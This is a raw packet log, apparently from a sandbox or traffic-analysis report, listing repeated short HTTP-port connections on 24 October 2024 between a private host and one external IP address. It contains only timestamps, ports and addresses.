Oct 24, 2024 17:02:23.205740929 CEST	49757	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:23.211105108 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:23.211146116 CEST	49757	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:23.217427969 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.412775993 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.412934065 CEST	49757	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.415539026 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.415607929 CEST	49757	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.418373108 CEST	80	49757	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.547487974 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.552992105 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.553193092 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.555114031 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.561616898 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:24.561675072 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:24.567044973 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.588660002 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.588805914 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.590356112 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.590507984 CEST	49763	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.594775915 CEST	80	49763	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.731827974 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.737267017 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.738250971 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.740081072 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.747837067 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:25.747925043 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:25.754416943 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.637290955 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.637708902 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.639601946 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.639667988 CEST	49774	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.643572092 CEST	80	49774	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.781264067 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.787131071 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.787218094 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.789365053 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.794806004 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:26.794869900 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:26.800514936 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.668710947 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.669186115 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.669954062 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.670021057 CEST	49780	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.675985098 CEST	80	49780	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.811871052 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.817529917 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.817625046 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.819351912 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.825397968 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:27.825460911 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:27.830914974 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.717905045 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.718138933 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.720370054 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.720463037 CEST	49786	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.723927975 CEST	80	49786	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.864563942 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.871383905 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.871473074 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.873809099 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.879156113 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:28.879211903 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:28.884627104 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.781430006 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.781590939 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.784497976 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.784578085 CEST	49792	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.787110090 CEST	80	49792	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.922964096 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.928764105 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.928883076 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.931011915 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.936548948 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:29.936630011 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:29.945296049 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:30.857218981 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:30.857302904 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:30.857404947 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:30.857456923 CEST	49798	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:30.862976074 CEST	80	49798	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:30.999973059 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:31.007788897 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:31.007957935 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:31.009783030 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:31.015239954 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:31.015360117 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:31.020982981 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.136374950 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.136590958 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.138602972 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.138737917 CEST	49806	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.141972065 CEST	80	49806	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.285435915 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.291435003 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.291529894 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.293499947 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.298835039 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:33.298933029 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:33.304404974 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.213545084 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.213680983 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.215704918 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.215749025 CEST	49820	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.219047070 CEST	80	49820	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.359239101 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.364712954 CEST	80	49826	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.364811897 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.366801977 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.372196913 CEST	80	49826	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:34.372256041 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:34.377913952 CEST	80	49826	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:35.272162914 CEST	80	49826	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:35.272272110 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.278001070 CEST	80	49826	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:35.278065920 CEST	49826	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.405451059 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.411814928 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:35.411968946 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.413671970 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.421330929 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:35.421422958 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:35.428555012 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.391191006 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.391379118 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.393877029 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.393932104 CEST	49832	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.397824049 CEST	80	49832	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.531950951 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.537543058 CEST	80	49845	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.537652016 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.539633989 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.545499086 CEST	80	49845	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:37.545567989 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:37.556279898 CEST	80	49845	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:38.478197098 CEST	80	49845	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:38.478307009 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.484052896 CEST	80	49845	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:38.484122038 CEST	49845	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.624834061 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.630693913 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:38.630796909 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.632541895 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.637954950 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:38.638010979 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:38.643774986 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.504625082 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.504865885 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.508295059 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.508359909 CEST	49853	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.510265112 CEST	80	49853	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.645205975 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.650665998 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.650743961 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.652800083 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.658262014 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:39.658318043 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:39.663871050 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.706804991 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.706963062 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:40.708583117 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.708642006 CEST	49859	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:40.712629080 CEST	80	49859	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.968975067 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:40.975866079 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.975933075 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:40.993042946 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:40.998776913 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:40.998847008 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:41.004833937 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.062196970 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.062393904 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.064163923 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.064222097 CEST	49866	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.068198919 CEST	80	49866	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.205254078 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.210788965 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.210880995 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.212672949 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.218091965 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:42.218169928 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:42.223558903 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.137540102 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.137633085 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.139627934 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.139677048 CEST	49875	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.143301964 CEST	80	49875	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.303441048 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.309089899 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.309164047 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.311990023 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.317687988 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:43.317732096 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:43.323287964 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.389446974 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.392151117 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.392280102 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.392580032 CEST	49881	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.397964001 CEST	80	49881	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.528819084 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.534291983 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.536959887 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.538822889 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.544162989 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:45.544944048 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:45.550570011 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.415992022 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.416414022 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.418135881 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.418195963 CEST	49893	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.421854973 CEST	80	49893	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.567109108 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.572932959 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.573029041 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.574980021 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.580364943 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:46.580421925 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:46.585942030 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.642119884 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.642216921 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.648236036 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.648297071 CEST	49899	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.648909092 CEST	80	49899	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.783318996 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.789305925 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.789397001 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.791491985 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.796885014 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:47.796961069 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:47.802529097 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:50.896435022 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:50.896698952 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:50.898237944 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:50.898303032 CEST	49907	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:50.902069092 CEST	80	49907	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:51.032052040 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:51.037571907 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:51.037641048 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:51.040842056 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:51.046194077 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:51.046250105 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:51.051543951 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.493185997 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.493288040 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.496578932 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.496649027 CEST	49925	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.499003887 CEST	80	49925	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.643075943 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.648783922 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.648879051 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.650609016 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.656002998 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:53.656101942 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:53.661494017 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.098172903 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.098284006 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.100761890 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.100821018 CEST	49941	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.103765011 CEST	80	49941	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.232548952 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.238305092 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.238429070 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.240186930 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.245512009 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:58.245580912 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:58.251121044 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.277235985 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.277600050 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.278565884 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.278615952 CEST	49963	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.282995939 CEST	80	49963	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.430176020 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.435800076 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.435897112 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.437935114 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.443329096 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:02:59.443401098 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:02:59.448807001 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.367789030 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.368597031 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.368673086 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.369251013 CEST	49968	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.374881029 CEST	80	49968	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.532908916 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.538466930 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.538548946 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.540592909 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.546082973 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:00.546133995 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:00.551652908 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.522497892 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.522799969 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.523382902 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.524090052 CEST	49972	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.528667927 CEST	80	49972	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.658711910 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.664305925 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.664424896 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.666158915 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.671938896 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:01.672985077 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:01.678661108 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:03.971559048 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:03.971788883 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:03.973407984 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:03.973479986 CEST	49976	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:03.977387905 CEST	80	49976	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:04.107510090 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:04.115098953 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:04.115226984 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:04.117002010 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:04.123996019 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:04.124053955 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:04.129527092 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.022277117 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.022506952 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.024343967 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.024410963 CEST	49980	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.027945995 CEST	80	49980	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.156328917 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.161931992 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.162087917 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.163805962 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.169297934 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:05.169369936 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:05.174873114 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:06.083108902 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:06.083278894 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.084038973 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:06.084101915 CEST	49983	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.088782072 CEST	80	49983	188.114.96.3	192.168.2.5
Oct 24, 2024 17:03:06.219249964 CEST	49987	80	192.168.2.5	188.114.96.3
Oct 24, 2024 17:03:06.224769115 CEST	80	49987	188.114.96.3	192.168.2.5
